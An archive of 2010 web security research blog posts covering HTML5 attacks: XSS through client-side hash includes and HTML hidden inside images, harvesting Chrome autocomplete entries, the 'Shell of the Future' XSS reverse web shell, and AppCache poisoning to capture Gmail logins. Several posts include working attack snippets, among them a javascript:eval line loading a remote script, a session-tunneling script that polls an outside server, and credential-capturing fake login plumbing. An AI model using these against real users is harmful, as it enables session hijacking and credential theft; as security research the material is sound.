Monday, November 8, 2010

HTML5 goodness at BlackHat Abu Dhabi this week

Just three more days to go for my 'Attacking with HTML5' talk at BlackHat Abu Dhabi. In addition to covering some of the interesting HTML5 attacks already released during 2010 by myself and other researchers, it has two new sections - HTML5-based port scanning and HTML5 botnets. I will be talking about a new way to perform JavaScript-based port scans that gives very accurate results. How accurate? You can determine whether the remote port is open, closed or filtered - that accurate. I am also going to release a tool called JSRecon that performs port and network scans using these techniques. Under HTML5 botnets I am going to talk about how you could send spam mail, perform a DDoS attack on a website and perform distributed cracking of hashes at incredible speeds - all using JavaScript. I am also going to release Ravan - a web-based tool to perform distributed cracking of hashes in a legitimate way. I am pretty happy with the way Ravan has shaped up and am very excited to see how folks react to it; initial reactions have been good. The whole point of the talk is that I am NOT bypassing any of the restrictions placed by the browser sandbox but instead working well inside those restrictions - it's just that the sandbox has become a whole lot looser :)

The tools and details will be online next week when I am back from Abu Dhabi. Stay tuned!

Tuesday, September 7, 2010

Re-visiting Java De-serialization: It can't get any simpler than this!!


Well it's been a while since I have blogged. Been quite busy with work lately. Also I guess Lava is better at blogging stuff so I'll leave that to him :)

After my talk at BH EU earlier this year, quite a lot of other really cool work has been published on penetration testing of Java thick/smart clients. Check out Javasnoop especially; it has some pretty good features you will want to use. Many people I spoke to recently said that modifying objects programmatically using the IRB shell in DSer is difficult and requires the penetration tester to have in-depth knowledge of the application's source code. Well, in the first place, penetration testing is a skill and it does require hard work, so understanding the application's internals is part and parcel of the job. That being said, DSer lets you play around with Java objects using an interactive shell with some helper methods and is completely extensible. It was meant to be a template to which you add your own stuff and extend its capabilities.

In this post I will show you a technique that extends DSer and simplifies the process of modifying Java objects. Before we start I would like to thank my colleague Chilik Tamir for introducing me to the XStream library and helping with this idea. XStream is a library that serializes Java objects to XML and back. Now, getting back to the topic, let's assume we encounter a complex object like the following in a request or response:

HashMap = { key1 = String[], key2 = HashMap }

I have chosen built-in Java types for simplicity, but they could be any custom objects you like. Modifying this via raw hex bytes would be a difficult task, as we will see later. For demonstration purposes, I'll make use of the following app:
Fig. 1: Demo app to generate complex JAVA objects
When the "Both" button is pressed, this application takes the inputs supplied in the three text fields, creates a HashMap similar to the one shown above and sends it to the backend server for processing. Once we capture this request in Burp, it looks similar to this:
Fig. 2: Request showing raw serialized data captured in Burp
DSer de-serializes this and renders it in its shell as follows:

{ keyTwo = [Ljava.lang.String;@70ac2b, 
  keyOne = { hmKey1=Manish,
             hmKey3=Andlabs,
             hmKey2=Saindane
           }
}

We can see that the HashMap has two keys (i.e. keyOne and keyTwo), whose values are a String array and a HashMap. I have added a few custom functions to DSer that use the XStream library to convert the above Java serialized object to XML, save it as a temp file and open it in any XML editor of your choice for further editing. The resulting XML looks as follows:
Fig. 3: XML generated from the JAVA serialized object
Notice how nicely XStream has rendered the XML from the given Java object. We can clearly see the <string-array> and the <map> elements (highlighted above) with their individual entries. We can edit the entries and modify them as we want. Let's modify the XML as follows:
Fig. 4: XML after modification
We have removed the "Andlabs" entry from the String array and added two extra entries (i.e. "Lavakumar" and "Kuppan"). The "hmKey3" entry has also been removed from the inner HashMap (highlighted above). As soon as we save this XML and close the editor, the code in DSer converts the XML back into a Java object, which looks similar to this:


{ keyTwo = [Ljava.lang.String;@9568c, 
  keyOne = { hmKey1=Manish,
             hmKey2=Saindane
           }
}

The custom functions will then take care of serializing this object, editing the "Content-Length" header and preparing a new "message" to be sent to the application server. You can observe the modified data in Burp from the history tab.

Fig. 5: Edited request as shown in Burp
So using this technique, modification of Java objects becomes trivial, and anyone without prior programming knowledge can edit the objects (as long as he/she knows how to edit text or XML ;)). The screenshot below shows the modified data being successfully passed to the server and rendered back in the output.
Fig 6: Modified data processed by the application
DSer is not restricted to Java serialized objects; it can be extended to (almost) any binary protocol you can think of. So do not restrict your thinking - be creative. In this post I just showed you how you can extend DSer's capabilities and simplify the process of editing Java objects. You can do the same with any other protocol; all you need is a basic understanding of how the protocol works.
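For the curious, here is a rough sketch of the kind of XML round trip the custom functions described above perform, written for this post using XStream's standard toXML()/fromXML() calls. This is illustrative code, not DSer's actual implementation, and the class and variable names are made up:

import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.security.AnyTypePermission;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.util.HashMap;

public class XmlRoundTrip {
    public static void main(String[] args) throws Exception {
        // Build an object similar to the one sent by the demo app
        HashMap<String, Object> payload = new HashMap<>();
        HashMap<String, String> inner = new HashMap<>();
        inner.put("hmKey1", "Manish");
        inner.put("hmKey2", "Saindane");
        inner.put("hmKey3", "Andlabs");
        payload.put("keyOne", inner);
        payload.put("keyTwo", new String[] { "Lavakumar", "Kuppan" });

        XStream xstream = new XStream();
        // Recent XStream releases lock down fromXML() by default; for a local
        // testing helper it is acceptable to allow any type to be rebuilt
        xstream.addPermission(AnyTypePermission.ANY);

        // Object -> XML: this is what gets written to a temp file and edited
        String xml = xstream.toXML(payload);
        System.out.println(xml);

        // ...the tester edits the XML by hand at this point...

        // XML -> Object: rebuild the (edited) object
        Object edited = xstream.fromXML(xml);

        // Object -> raw bytes: plain Java serialization, ready to be placed back
        // into the request body (with the Content-Length header adjusted)
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(baos)) {
            oos.writeObject(edited);
        }
        System.out.println("Serialized payload is " + baos.toByteArray().length + " bytes");
    }
}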

I'll add the above-mentioned custom methods to DSer and release it soon; I just need to clean up the code and make a few changes here and there. If anyone needs to try it out in the meantime, just ping me and I'll give you the source code. So until next time, happy hacking!!

Tuesday, August 10, 2010

XSSing client-side dynamic HTML includes by hiding HTML inside images and more

Matt Austin made a brilliant discovery some time back and wrote a detailed post about his hack; you absolutely must read it. Basically, it is a problem with sites that use Ajax to fetch the page named in the URL after the # and then include it in the innerHTML of a DIV element; he picks 'touch.facebook.com' as an example.

Quoting from his post:
If you click on any URL you see the links don't actually change the page but loads them with ajax. http://touch.facebook.com/#profile.php actually loads http://touch.facebook.com/profile.php into a div on the page.
The problem here is that the XMLHttpRequest object can make Cross Origin calls thanks to HTML5. So if a victim clicks on a link like 'http://touch.facebook.com/#http://attacker.site/evil.php' then 'http://attacker.site/evil.php' is fetched and is included in the innerHTML of the page leading to XSS. Clever find!
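The vulnerable pattern boils down to something like this (a simplified reconstruction for illustration, not the site's actual code; the 'content' DIV is assumed):

// Whatever follows the '#' is fetched over XHR and written straight into the page
function loadFromHash() {
    var page = location.hash.substring(1);   // "profile.php" -- or "http://attacker.site/evil.php"
    var xhr = new XMLHttpRequest();
    xhr.open("GET", page, true);
    xhr.onreadystatechange = function () {
        if (xhr.readyState === 4) {
            // The response is trusted blindly; with Cross Origin Requests the
            // attacker can point 'page' at a host he controls
            document.getElementById("content").innerHTML = xhr.responseText;
        }
    };
    xhr.send();
}
window.onhashchange = loadFromHash;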

The very first paragraph of his post, however, made me very uncomfortable:
HTML 5 does not do much to solve browser security issues. In fact it actually broadens the scope of what can be exploited, and forces developers to fix code that was once thought safe.
Call me an HTML5 fanboy, but I believe the spec designers have taken security very seriously, based on the discussions I have seen while lurking on their mailing lists. So such a blatant allegation was hard for me to digest, and I was secretly hoping that this design was vulnerable even without taking into account the Cross Origin Request feature of HTML5.

And it turns out it is actually vulnerable even with plain old HTML4. The problem here is that the application fetches whatever resource is provided after the # and includes it in the innerHTML of a DIV element. What this means is that every single file on that site - (CSS|JS|JPG|...|log) - is now treated as HTML.

How is this a problem? Let's say the site lets users upload their profile pictures and stores them under the same domain name (Facebook, however, uses a different domain for static content). Normally this cannot lead to XSS, because the image is only referenced from the <img> tag, which parses and renders it as an image. Under the design being discussed, however, the same image file can be rendered as HTML. When a victim clicks on a link like 'http://vulnsite.com/#profile_334616.jpg', 'profile_334616.jpg' is fetched and the 'responseText' is added to the innerHTML property.

It is possible to hide HTML inside images without any visual difference. The HTML can come after the End of Image marker (0xFF D9) or right before it, and the image still looks the same. It can also be added in the comment section, but some sites strip comments from images to save storage space. When the content of such an image is rendered as HTML, the binary section of the image is treated as text and displayed as-is, while the HTML section is parsed and rendered by Chrome, Safari and Firefox. Opera and IE, however, stop parsing after reading a few bytes of the binary content. I tried moving the HTML to the beginning of the image, right after the Start of Image marker inside a comment section, but they still refused to render it.
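Creating such an image is trivial. A small Node.js sketch (file names made up) that appends a payload to a valid JPEG:

// Bytes after the End of Image marker (0xFF 0xD9) do not affect how the file
// renders as an image, but they are parsed if the file is ever treated as HTML
const fs = require("fs");

const image = fs.readFileSync("profile.jpg");
const payload = Buffer.from("<script>alert(document.cookie)</script>");

fs.writeFileSync("profile_poisoned.jpg", Buffer.concat([image, payload]));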

Check out this simple POC to see this in action.

Apart from images, any user-uploaded file could potentially turn into HTML under this design. Even if the site does not have any file upload features, an attacker could indirectly get his images onto it through social engineering. News and media websites routinely include images provided to them by external sources, and an attacker could slip in his HTML-poisoned image, which might eventually end up on the site. Though a little far-fetched, something like this is not entirely impossible. Any compression applied by the server to the images would, however, mangle the HTML.

Another way an attacker can get his data onto the server is through server logs. If the log file stores User-Agent strings unencoded, an attacker could include HTML in his request's UA field and poison the log. An administrator with access to these logs could then be sent a link like http://admin.vulnsite.com/#August2010.log, and clicking on it would eventually lead to that HTML being rendered.

Though there could be other scenarios, I think you get the general idea. Coming back to the design itself: it was vulnerable to begin with, and HTML5's Cross Origin Requests only made it much easier to exploit.

Even with all these counter-arguments, I eventually have to agree with Matt. Cross Origin Requests are one feature where HTML5 actually got it wrong, because it gave additional capability to the same API with absolutely no extra code required. The same code can now do things that the developers never anticipated. It's like hitting your car's accelerator one random morning and finding out it is now also wired to NOS - I don't think you would like that surprise.

IE, on the other hand, has done the right thing with XDomainRequest, which is a new API and not a simple extension of XHR. Perhaps the XMLHttpRequest object should get a new property that must be explicitly set to enable COR.

Eg:
var xhr = new XMLHttpRequest();
xhr.cor = true;
xhr.open("http://external.site/");
A simple extension like this could prevent existing code from becoming vulnerable while giving the same familiar XHR API to developers for COR.

Tuesday, August 3, 2010

Stealing entire Auto-Complete data in Google Chrome

A couple of weeks back, Jeremiah Grossman posted details of his Safari Auto-Complete hack along with a really cool POC. To me the most interesting aspect of the POC is how it populates the text box with JavaScript, simulating the victim’s keystrokes.

I ran the POC in Google Chrome, and as each character was entered into the input box, a list of auto-complete suggestions popped up. The amount of information in those lists was scary. Jeremiah’s POC was not designed to capture the information in the auto-complete suggestion lists; it was only looking for values that got populated into the textbox.

I initially thought it would be relatively easy to capture the information in these lists by simulating a down-arrow keypress and then an Enter keypress to populate the textbox. That approach didn’t work, because the list that pops up is not part of the DOM, so JavaScript has absolutely no control over it. In fact, moving the mouse over the list or pressing the arrow keys to move through the suggestions does not even trigger the Mousemove/KeyDown events.

After playing around for some time I figured out one way to extract the information from the auto-complete suggestion list. The technique is not entirely automated, but it requires only minimal user interaction: the user just has to press the Enter key periodically and the rest is done with JavaScript. To social-engineer the user into pressing Enter, I have written a simple game where the user is randomly shown either a white or a black box and asked to press Enter when the black box is shown and do nothing when the white box is shown. The end result is actually pretty convincing.

This is how it works:
  1. The user is asked to place his mouse pointer in one section of the page. By following the mouse movement we know exactly where the pointer is located.
  2. We create an input element of very small width (3px) and position it just a little above where the mouse pointer rests.
  3. Now, using the same method as Jeremiah, a character is entered into the input box.
  4. When the auto-complete suggestion list pops up, the first entry in the list is right under the mouse pointer and is highlighted automatically.
  5. When the user hits Enter (he thinks he is playing a game) this entry is populated into the input box and is read by JavaScript.
  6. The input box is then moved a little upwards and step 3 is repeated; this time the mouse pointer is over the second entry in the suggestion list, which gets highlighted.
Steps 3 to 6 are repeated till all values are read. A rough sketch of this loop is shown below.
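The sketch below is illustrative only: the element name is made up, and typeCharacter() is a placeholder for the keystroke-simulation trick from Jeremiah's POC, which is browser-specific and not shown here.

var stolen = [];
var offset = 0;
var mouseX = 0, mouseY = 0;

// Step 1: track the pointer so we know where it is parked
document.onmousemove = function (e) {
    mouseX = e.clientX;
    mouseY = e.clientY;
};

// Steps 2, 3 and 6: a 3px-wide input placed just above the pointer; every round
// it moves up a little so the next suggestion ends up under the pointer
function nextRound() {
    var input = document.getElementById("harvest");
    input.style.position = "absolute";
    input.style.width = "3px";
    input.style.left = mouseX + "px";
    input.style.top = (mouseY - 20 - offset) + "px";
    input.value = "";
    input.focus();
    typeCharacter(input, "a");          // pops up the auto-complete list
    offset += 25;                       // assumed row height of the suggestion list
}

// Steps 4 and 5: when the user hits Enter in the "game", the highlighted entry
// is written into the input box; a simple poll picks it up and moves on
setInterval(function () {
    var input = document.getElementById("harvest");
    if (input.value.length > 1) {       // more than the single typed character
        stolen.push(input.value);
        nextRound();
    }
}, 200);

// the game's logic calls nextRound() once the victim's pointer is in place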

As you can see, the only interaction required from the user is hitting the Enter key periodically. Chrome allows a maximum of six auto-complete suggestions per character, and if the user plays the game for a couple of minutes the entire auto-complete dataset can be stolen by the attacker.

The POC works best in Google Chrome running on Windows, because in this set-up an input element of 3px width gets an auto-complete suggestion list that is also 3px wide; it looks like nothing more than a thin white strip. With a cleverly selected background this 3px strip is camouflaged and becomes practically invisible, as done in the POC.

In Google Chrome running on Linux (thanks to Mario for verifying this) the width of the auto-complete box is not affected by the width of the input element, so even if the input element is 3px wide the pop-up list appears at its normal width. It’s the same story with Firefox, even on Windows. If the list is at its normal width it cannot be hidden from the user, CSS overlay techniques don’t work, and the attack becomes very obvious to the victim.

Another factor that makes this attack possible is that when the pop-up list appears, the ‘mousemove’ event is triggered automatically, so the entry under the mouse pointer gets selected without the user having to move the mouse. I am not sure if this is Google Chrome-specific behavior or common to all browsers; I haven’t tested that yet.

The POC is available here and there is also a video if you would like to see the attack in action.

Monday, July 19, 2010

Shell of the Future – Reverse Web Shell Handler for XSS Exploitation


If you claim that "XSS is not a big deal" that means you never owned something by using it and that's your problem not XSS's
-Ferruh Mavituna, Author of XSS Shell, XSS Tunnel and NetSparker
Cross-site Scripting is an interesting vulnerability. It is relatively easy to discover in a penetration test, but demonstrating its impact has always been tricky. So tricky, in fact, that it has pushed one of the most creative groups of people in IT (penetration testers) into using the most boring and misleading POC possible. Yes, you guessed it: the ubiquitous JavaScript alert() box. To break the monotony, testers sometimes change the message being displayed, but that’s as far as it usually goes. It also has the nasty side effect of developers blocking the word ‘alert’ in their code while ‘eval’ is let through.

In pentests, XSS is usually treated as a dead-end vulnerability: you discover it, take a screenshot and move on to something else. It cannot be exploited and used as a stepping stone to another attack, because exploiting it would require attacking a user, and that is something penetration testers aren’t allowed to do; nine times out of ten the contract only lets us attack the server or the application. That, however, does not stop real-world attackers from going so far as taking over entire servers using a simple XSS.

The real impact of XSS is that an attacker can do anything that the user can do with his session. Today I am releasing a tool that lets you demonstrate this very impact with the same effort as showing the alert box. Ladies and gentlemen, I give you: Shell of the Future.

Shell of the Future is a reverse web shell handler. It’s the browser equivalent of a reverse command shell: instead of a command prompt into which you type commands, you get to browse the victim’s HTTP/HTTPS session from your own browser. Even though the site is being browsed from the pentester’s browser, all the pages are fetched by the victim’s browser. This is done by tunneling HTTP over HTTP using HTML5 Cross Origin Requests. The hijacked session also displays a hovering banner over it, which can be heavily customized, making it the perfect POC for your pentest report.

So how does it work? Very simple. Shell of the Future contains both a proxy server and a web server. The pentester sets his browser to use Shell of the Future’s proxy server, starts the tool and goes to http://127.0.0.1/sotf.console in his browser. This shows the web interface from which the victim’s sessions can be hijacked.

Before hijacking a session we need to inject our JavaScript exploit into the victim’s browser using XSS. Shell of the Future comes with two ready-made JavaScript exploits - e1.js and e2.js.

Once injected (for example, via a script tag that loads e1.js), the exploit starts talking to the Shell of the Future server and the session becomes available for hijacking from the console page. To hijack it, just click on the link that says ‘Hijack Session’ and the session can be browsed from the pentester’s browser.

It is that simple: no installation, no configuration, no additional software - it’s all set up and ready to go in one click.

Even if the site is not vulnerable to XSS, the victim’s session can still be hijacked by getting them to paste the following code into the browser’s address bar.
Eg:
javascript:eval("s=document.createElement('script');s.src='http://127.0.0.1/e1.js';document.getElementsByTagName('head')[0].appendChild(s)")

Shell of the Future can be downloaded from our tools section and there is also a detailed manual available.
A video demonstration of all the features is available here.

If you are interested in more details then read on.

The tool makes use of HTML5 Cross Origin Requests to tunnel HTTP traffic over HTTP. Once e1.js or e2.js is injected into the victim’s browser, it starts polling Shell of the Future (SotF) through Cross Origin Requests (COR). SotF assigns a unique ID to each session and shows it on its console page. When ‘Hijack Session’ is clicked, the request from the pentester’s browser is sent to the SotF proxy, which in turn sends it to the SotF server, which passes it on to the victim. The victim’s browser fetches the page and sends the response back to the SotF server using COR, which hands it to the proxy and then to the pentester’s browser.
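Stripped of all detail, the injected script's side of the tunnel looks roughly like this; the endpoint paths and parameter names are invented for this sketch, see e1.js for the real implementation:

var SOTF = "http://127.0.0.1";                    // Shell of the Future server
var sessionId = Math.random().toString().substring(2);

function poll() {
    var xhr = new XMLHttpRequest();               // Cross Origin Request to SotF
    xhr.open("GET", SOTF + "/poll?id=" + sessionId, true);
    xhr.onreadystatechange = function () {
        if (xhr.readyState !== 4) return;
        if (xhr.responseText) {
            fetchAndReturn(xhr.responseText);     // URL the pentester wants fetched
        }
        setTimeout(poll, 1000);
    };
    xhr.send();
}

function fetchAndReturn(url) {
    // Same-origin request: it rides on the victim's session, so the victim's
    // cookies go along automatically
    var xhr = new XMLHttpRequest();
    xhr.open("GET", url, true);
    xhr.onreadystatechange = function () {
        if (xhr.readyState !== 4) return;
        var out = new XMLHttpRequest();           // hand the response back over COR
        out.open("POST", SOTF + "/response?id=" + sessionId, true);
        out.send(xhr.responseText);
    };
    xhr.send();
}

poll();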

e1.js and e2.js are very similar, but e2.js has an extra trick to make the attack more practical. You can only browse the victim’s session for as long as the injected JavaScript is active in the victim’s browser, and sometimes this can be a problem. Say the site with the XSS cannot be placed in an iframe; then the victim must be directly on the page where the injection is happening. The lifetime of the injected script is now extremely limited, because the moment the victim clicks a link and browses to another page on the site, the script dies. To counteract this, e2.js adds an invisible link to the page which is placed exactly under the mouse pointer and follows its movements. When the victim clicks on any part of the page he is actually clicking the invisible link, which opens the same site in a new tab that also becomes the active tab. The victim then happily browses the site in the new tab while the injected script stays alive in the original tab. The transition to the new tab is pretty smooth, so most users would never suspect anything.
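In essence, the e2.js trick is just this (simplified):

// An invisible link is kept directly under the pointer, so any click opens the
// same site in a new tab while the injected script stays alive in this one
var link = document.createElement("a");
link.href = location.href;
link.target = "_blank";
link.style.display = "block";
link.style.position = "absolute";
link.style.width = "20px";
link.style.height = "20px";
link.style.opacity = "0";
document.body.appendChild(link);

document.onmousemove = function (e) {
    link.style.left = (e.pageX - 10) + "px";
    link.style.top = (e.pageY - 10) + "px";
};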

If you want still more details, check the detailed documentation.

I got this idea while reading about HTML5 Cross Origin Requests and thought it was a new concept, so I started this project as a POC. But when I spoke to Manish about it a little later, he burst my bubble and told me that XSS Tunnel already did something similar. In fact, XSS Proxy and XSS Tunnel both did something similar, and that too back when there was no COR!! * bows to both Anton Rager and Ferruh Mavituna and thanks Manish for saving me from embarrassment once again *

So I stopped working on it for some time and then started again with a different approach. Rather than making it a POC for my idea, which turned out to be a well-known technique, I have built Shell of the Future specifically as a tool for making POCs for XSS and JS injection vulnerabilities. Both the victim and the attacker can be on the same system, just in different browsers; Chrome and Firefox are ideal candidates. It works in IE and Safari as well, but their aggressive caching can sometimes serve stale content. Opera, however, does not support COR yet, so the tool doesn't work there.

The goal was to make a tool that accurately demonstrates the severity of XSS with literally the same effort as getting the infamous alert box to pop up, and I think that has been achieved.

This time around I am providing the source code of the tool as well. It’s not the most elegantly written piece of code but hey, it works!

Sunday, June 27, 2010

Chrome and Safari users open to stealth HTML5 AppCache attack

Google Chrome, Safari, Firefox and Opera (beta) have implemented the HTML5 Offline Application Cache feature. Using this feature, a website can take greater control over the caching process to enable offline access.

When a website tries to create an Offline Application Cache, Firefox and Opera ask for user permission, and only after the user permits it is the site able to create the cache. With Google Chrome and Safari this step is skipped: any website can create an Application Cache without the user even knowing about it.

The thing with caches is that they can be poisoned very easily the moment you connect to an unsecured network, like open Wi-Fi. By poisoning a cached JavaScript file of Facebook or Twitter, an attacker can eventually take control of your account. With the normal cache, however, only HTTP content can be easily poisoned; it is difficult to poison a page that is served only over HTTPS. So none of Gmail’s files can be poisoned - they are all served over HTTPS.

Now enter the HTML5 Application Cache. Unlike a traditional cache, the Application Cache can hold any file. For example, the root resource ‘/’ of a site can be cached. Let’s say an application cache is created for ‘/’ of www.facebook.com. Then every time the user types www.facebook.com into their browser, this cached page is served. If this were done with the normal cache, the browser would send a request to the server for the resource, and only if the server responded with a 304 Not Modified would the cache be served. But for ‘/’ every site responds with a 200 OK carrying the index page’s content, and that is what gets loaded, not the cache.

The point is that with the Application Cache, root resources can be cached; this cannot be done with the normal cache. An attacker can therefore plant a malicious cache for the index page of every HTTP site as soon as the victim connects to an unsecured Wi-Fi network. For Facebook, for example, if the index page is controlled by the attacker he can capture the victim’s username and password. Facebook, being an HTTP site (post authentication), can anyway be compromised by poisoning the normal cache. But Gmail?

Almost all users open Gmail by typing gmail.com into the address bar, which means http://gmail.com (remember SSLstrip??). The server responds with a redirect to http://mail.google.com/mail/, and when http://mail.google.com/mail/ is requested the server redirects to https://www.google.com/accounts/ServiceLogin?service=mail&blahblah... So there are two HTTP requests before the user lands on an HTTPS page, and either of them, http://gmail.com/ or http://mail.google.com/mail/, can be cached using the Application Cache.

This is how the entire attack works:

Step 1: The victim connects to an unsecured network controlled by the attacker.

Step 2: The victim browses to any random website; even opening the browser would do, as it sends a request for the home page.

Step 3: The attacker responds to this request with a page containing a hidden iframe pointing to http://mail.google.com/mail/.

Step 4: The victim’s browser sends a request for http://mail.google.com/mail/.

Step 5: The attacker responds with his own copy of the Gmail login page, which looks exactly like the real login page but includes a backdoor to steal the victim’s credentials when they are entered. This page also includes the manifest attribute on the HTML element so that the page is cached (a rough sketch of such a page follows these steps).

Step 6: The victim goes back to a secured network (home/office), types in gmail.com and is redirected by the Google server to http://mail.google.com/mail/.

Step 7: The browser loads the cached fake login page.

Step 8: The user enters his Gmail credentials into it, and the credentials are sent over to the attacker.
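As mentioned in Step 5, all it takes to get the fake page cached is a manifest attribute on its html element. A rough sketch of such a page (the file name is invented and the credential-stealing backdoor is left out):

<!DOCTYPE html>
<html manifest="cache.manifest">
<head><title>Gmail: Email from Google</title></head>
<body>
  <!-- attacker's copy of the login page goes here, with a backdoor that
       captures the credentials before submitting them -->
</body>
</html>

During the attack the attacker also serves the manifest itself:

CACHE MANIFEST
# served as cache.manifest with Content-Type: text/cache-manifest; the page
# carrying the manifest attribute is cached automatically as a master entry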

By poisoning or creating a malicious Application Cache, an attacker can steal the victim’s credentials even for HTTPS-only websites.

I have made a POC for this attack using Imposter. The POC comes with a config file loaded with payloads for Facebook and Gmail. The cached pages load fake login pages from www.andlabs.org through an iframe. Once the victim enters his username and password, they are stored locally in the victim’s browser, in the LocalStorage of www.andlabs.org, and the credentials are passed on to the parent frame using the HTML5 postMessage API. The parent frame then logs the user in with these credentials. The entered credentials can be viewed by visiting http://www.andlabs.org/hacks/viewcreds.html. The credentials are never sent to the AnD Labs server, so it’s safe to try out the POC.
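The plumbing inside the POC is roughly this (simplified, not the actual POC code):

// Inside the framed fake login page (on www.andlabs.org):
function onLoginSubmit(user, pass) {
    // keep a local copy in www.andlabs.org's LocalStorage so it can be viewed later
    localStorage.setItem("creds_" + new Date().getTime(), user + ":" + pass);
    // hand the credentials to the parent frame (the poisoned cached page)
    parent.postMessage(JSON.stringify({ u: user, p: pass }), "*");
}

// Inside the parent frame (the poisoned cached page):
window.addEventListener("message", function (e) {
    var creds = JSON.parse(e.data);
    // ...fill in and submit the genuine login form using creds.u and creds.p...
}, false);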

There is a video of the entire attack using the POC here. The POC can be downloaded here.

One point of interest is the manifest file. Every time a cached file is requested, the browser asks the server for the manifest file, and if the server responds with a 404 the cache is removed. Picking an existing file on the server as the manifest file solves this issue, since the server returns a 200. This does not cause the cache to be updated either, because the server does not send “text/cache-manifest” in the Content-Type header. Even without this trick the poisoned cache is served the first time but removed afterwards; using this technique keeps the cached file alive until the user deletes it.
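In practice that just means pointing the manifest attribute at some resource that already exists on the target site (the path below is made up):

<html manifest="/images/logo.gif">
<!-- /images/logo.gif returns 200 but not text/cache-manifest, so the poisoned
     cache is neither removed nor updated -->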

Coming back to Chrome and Safari: when I first realized that they were not prompting for user permission, I thought it was a serious oversight. I even contacted both security teams; however, they didn’t consider this a security issue. On closer look their stance makes sense, because they treat the Application Cache the same way as the normal cache: when you delete the cache in these browsers, all Application Cache data is deleted as well. In Firefox they are handled separately; deleting the normal cache does not delete the Application Cache, which has to be deleted explicitly. It is difficult to say which approach is better, but the idea of a user permission prompt is more reassuring to me. Till then, browsing in private/incognito mode should keep users safe.

Update:
Chris Evans pointed out on FD that root resources can be cached even using the normal cache mechanism, so using the Application Cache for that reason alone might not give the attacker an edge.
However, using the Application Cache does have a major advantage over the normal cache.
When a root resource is cached using the normal cache, it is removed the moment the user hits refresh on that page, but the Application Cache stays. This can give an attacker continued access to the victim's browser until the user explicitly clears the cache; in Firefox, Offline Website Data has to be cleared separately.

Sunday, June 13, 2010

HTML5 Security Articles and Live Demos

HTML5 is getting increasingly more attention from the developer community, as it brings features most developers have never had before. Client-side storage with Web SQL Database, Offline Storage, Cross Origin Requests, the Offline Application Cache and Cross Origin Messaging are some of the features that are going to have developers drooling over the next few years at the thought of all the cool things they could do.

With all these new possibilities we are going to see many new types of vulnerabilities and attacks. Security has been a prime consideration in the design of the HTML5 spec; for instance, the design of the Web SQL Database API naturally encourages prepared statements, making it actually a little harder to introduce SQL injection vulnerabilities. Implementation mistakes, however, will be plentiful, and it will be interesting to study them. To help developers avoid the more obvious mistakes when implementing these features, I have written two detailed articles explaining what can go wrong and how it can be avoided. These articles cover the Web SQL Database and Cross Origin Request features. Some of the points mentioned might look very obvious, but in my experience doing penetration tests I have personally seen far more obvious mistakes with very serious consequences.

The two articles are:
  1. Web SQL Database Security - http://code.google.com/p/html5security/wiki/WebSQLDatabaseSecurity
  2. Cross Origin Request Security - http://code.google.com/p/html5security/wiki/CrossOriginRequestSecurity
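As a small taste of the Web SQL Database article (the first link above), this is the parameterised style the API encourages; table and variable names here are made up:

// User input goes in as arguments, never concatenated into the SQL string
var db = openDatabase("notes", "1.0", "demo", 2 * 1024 * 1024);
var userInput = location.hash.substring(1);      // stand-in for untrusted data

db.transaction(function (tx) {
    tx.executeSql("CREATE TABLE IF NOT EXISTS notes (id INTEGER PRIMARY KEY, body TEXT)");
    tx.executeSql("INSERT INTO notes (body) VALUES (?)", [userInput]);      // safe
    // Vulnerable by comparison:
    // tx.executeSql("INSERT INTO notes (body) VALUES ('" + userInput + "')");
});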

My original idea was to cover these topics in a series of blog posts, but I was in luck: around the same time Mario announced his HTML5 Security CheatSheet project, and when contacted he liked my idea and was nice enough to add me to his project. So now the material is in the form of a wiki page, which is great because it can be updated constantly based on feedback and ideas from readers and the findings of other researchers.

There is also an HTML5 Security Quick Reference Guide, along with live demos of secure and insecure implementations of some features, at http://www.andlabs.org/html5.html

All comments/suggestions/feedback are welcome.